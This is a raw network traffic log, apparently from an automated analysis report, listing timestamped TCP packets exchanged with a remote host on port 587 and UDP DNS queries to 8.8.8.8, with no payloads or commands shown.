Sep 26, 2024 09:21:13.275374889 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.275407076 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.275418997 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.275454998 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.275486946 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.275489092 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.275532007 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.278470039 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.278593063 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.278635025 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.278696060 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.280436993 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.280447960 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.280467033 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.280488014 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.280497074 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.280529022 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.280827999 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.283411980 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.283493996 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.283518076 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.283538103 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.283576012 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.283576012 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.285381079 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.285408974 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.285434008 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.285548925 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.285586119 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.285594940 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.285614967 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.285676956 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.285703897 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.285820007 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.288456917 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.288528919 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.288537979 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.290122032 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.290520906 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.292171001 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292181015 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292210102 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292222977 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292239904 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292296886 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292340040 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292483091 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292525053 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292538881 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292561054 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292570114 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292574883 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292578936 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.292943001 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.295425892 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295543909 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295557976 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295583010 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295593023 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295610905 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295633078 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295645952 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295656919 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295689106 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295697927 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295715094 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295787096 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.295799971 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.296112061 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.299195051 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299206018 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299253941 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299263954 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299274921 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299288034 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299300909 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299551964 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299563885 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299631119 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299638987 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299657106 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299669027 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.299680948 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.300014019 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.301709890 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301738977 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301753044 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301762104 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301781893 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301794052 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301837921 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301884890 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301893950 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301911116 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301922083 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301951885 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301960945 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.301980019 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.302423954 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.305830956 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.305845976 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.305871010 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.305882931 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.305926085 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.305933952 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.305949926 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.306525946 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.306545973 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.306638002 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.306647062 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.306664944 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.306673050 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.306688070 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307161093 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.307777882 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307787895 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307807922 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307842016 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307851076 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307871103 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307882071 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307895899 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307917118 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307929039 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307940960 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307952881 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307966948 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.307975054 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.308239937 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.312011957 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312076092 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312138081 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312180042 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312256098 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312298059 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312338114 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312378883 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312418938 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312455893 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312495947 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312555075 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312567949 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312588930 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.312980890 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.313069105 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.313079119 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.313129902 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.313138962 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.313160896 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.313173056 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.313193083 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.313205004 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.313292980 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.313328028 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.318346977 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.318414927 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.737855911 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.951723099 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.951787949 CEST	49183	587	192.168.2.22	217.12.218.219

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 09:19:26.586587906 CEST	54562	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:26.715449095 CEST	53	54562	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:26.767976999 CEST	52917	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:26.776418924 CEST	53	52917	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:27.556958914 CEST	62751	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:27.566807032 CEST	53	62751	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:29.469259977 CEST	57893	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:29.475591898 CEST	53	57893	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:29.478178978 CEST	54821	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:29.484837055 CEST	53	54821	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:30.218724012 CEST	54719	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:30.228991032 CEST	53	54719	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:31.247973919 CEST	49881	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:31.255779982 CEST	53	49881	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:31.259965897 CEST	54998	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:31.266483068 CEST	53	54998	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:31.743609905 CEST	52781	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:31.753287077 CEST	53	52781	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:32.393208981 CEST	63926	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:32.400039911 CEST	53	63926	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:32.402793884 CEST	65510	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:32.410713911 CEST	53	65510	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:33.324820042 CEST	62672	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:33.331862926 CEST	53	62672	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:33.992482901 CEST	56475	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:33.998795033 CEST	53	56475	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:34.001797915 CEST	49384	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:34.008224964 CEST	53	49384	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:35.393383026 CEST	54842	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:35.400599957 CEST	53	54842	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:36.052402973 CEST	58105	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:36.058707952 CEST	53	58105	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:36.060895920 CEST	64928	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:36.067337036 CEST	53	64928	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:37.896891117 CEST	57390	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:37.908869982 CEST	53	57390	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:38.588713884 CEST	58095	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:38.595184088 CEST	53	58095	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:38.617883921 CEST	54261	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:38.624263048 CEST	53	54261	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:39.539434910 CEST	60507	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:39.546693087 CEST	53	60507	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:40.172224998 CEST	50446	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:40.178802013 CEST	53	50446	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:40.181615114 CEST	55939	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:40.187988997 CEST	53	55939	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:40.658905029 CEST	49608	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:40.665707111 CEST	53	49608	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:41.281992912 CEST	61486	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:41.288538933 CEST	53	61486	8.8.8.8	192.168.2.22
Sep 26, 2024 09:19:58.353692055 CEST	62453	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:19:58.405874968 CEST	53	62453	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:03.525368929 CEST	50568	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:03.569721937 CEST	53	50568	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:15.785312891 CEST	61467	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:15.832356930 CEST	53	61467	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:58.346084118 CEST	61618	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:58.353182077 CEST	53	61618	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:58.353353024 CEST	61618	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:58.360304117 CEST	53	61618	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:58.360451937 CEST	61618	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:58.367763042 CEST	53	61618	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:58.367913961 CEST	61618	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:58.375001907 CEST	53	61618	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:58.375142097 CEST	61618	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:58.402622938 CEST	53	61618	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:58.604068041 CEST	54422	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:58.641184092 CEST	53	54422	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:58.641385078 CEST	54422	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:58.675951004 CEST	53	54422	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:58.676589966 CEST	54422	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:58.683180094 CEST	53	54422	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:58.683401108 CEST	54422	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:58.690274000 CEST	53	54422	8.8.8.8	192.168.2.22
Sep 26, 2024 09:20:58.690412998 CEST	54422	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:20:58.697407961 CEST	53	54422	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:00.328174114 CEST	52074	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:00.336644888 CEST	53	52074	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:00.336836100 CEST	52074	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:00.343810081 CEST	53	52074	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:00.343971968 CEST	52074	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:00.350385904 CEST	53	52074	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:00.350528955 CEST	52074	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:00.357374907 CEST	53	52074	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:00.357543945 CEST	52074	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:00.365541935 CEST	53	52074	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:02.923613071 CEST	50337	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:02.930648088 CEST	53	50337	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:02.930986881 CEST	50337	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:02.937877893 CEST	53	50337	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:02.938046932 CEST	50337	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:02.944807053 CEST	53	50337	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:02.944937944 CEST	50337	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:02.967027903 CEST	53	50337	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:02.967175007 CEST	50337	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:02.974311113 CEST	53	50337	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.132601023 CEST	61826	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.139451027 CEST	53	61826	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.139672995 CEST	61826	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.146608114 CEST	53	61826	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.146742105 CEST	61826	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.153793097 CEST	53	61826	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.153917074 CEST	61826	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.161292076 CEST	53	61826	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.161408901 CEST	61826	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.168138981 CEST	53	61826	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.344595909 CEST	56329	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.351737976 CEST	53	56329	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.352052927 CEST	56329	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.360160112 CEST	53	56329	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.360590935 CEST	56329	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.367604971 CEST	53	56329	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.367795944 CEST	56329	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.375056028 CEST	53	56329	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.375183105 CEST	56329	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.381688118 CEST	53	56329	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.568721056 CEST	63469	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.654923916 CEST	53	63469	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.655184031 CEST	63469	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.661277056 CEST	53	63469	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.661813021 CEST	63469	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.668488026 CEST	53	63469	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.668951035 CEST	63469	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.675648928 CEST	53	63469	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:03.676059008 CEST	63469	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:03.682908058 CEST	53	63469	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.170811892 CEST	59447	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.177917004 CEST	53	59447	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.178133965 CEST	59447	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.185512066 CEST	53	59447	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.185710907 CEST	59447	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.192739010 CEST	53	59447	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.192900896 CEST	59447	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.199989080 CEST	53	59447	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.200128078 CEST	59447	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.207165956 CEST	53	59447	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.383172989 CEST	51828	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.390434980 CEST	53	51828	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.390629053 CEST	51828	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.397711039 CEST	53	51828	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.398060083 CEST	51828	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.405448914 CEST	53	51828	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.405949116 CEST	51828	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.412259102 CEST	53	51828	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.412441969 CEST	51828	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.419365883 CEST	53	51828	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.729196072 CEST	53406	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.736274958 CEST	53	53406	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.736429930 CEST	53406	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.742820024 CEST	53	53406	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.742955923 CEST	53406	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.750003099 CEST	53	53406	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.750129938 CEST	53406	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.756540060 CEST	53	53406	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.756659031 CEST	53406	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.763091087 CEST	53	53406	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.943656921 CEST	56345	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.950901031 CEST	53	56345	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.951210022 CEST	56345	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.958105087 CEST	53	56345	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.958583117 CEST	56345	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.965656996 CEST	53	56345	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.965799093 CEST	56345	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.972901106 CEST	53	56345	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:07.973226070 CEST	56345	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:07.980240107 CEST	53	56345	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:09.103986025 CEST	51870	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:09.276721001 CEST	53	51870	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:09.276947975 CEST	51870	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:09.285681009 CEST	53	51870	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:09.285861969 CEST	51870	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:09.292628050 CEST	53	51870	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:09.292778969 CEST	51870	53	192.168.2.22	8.8.8.8
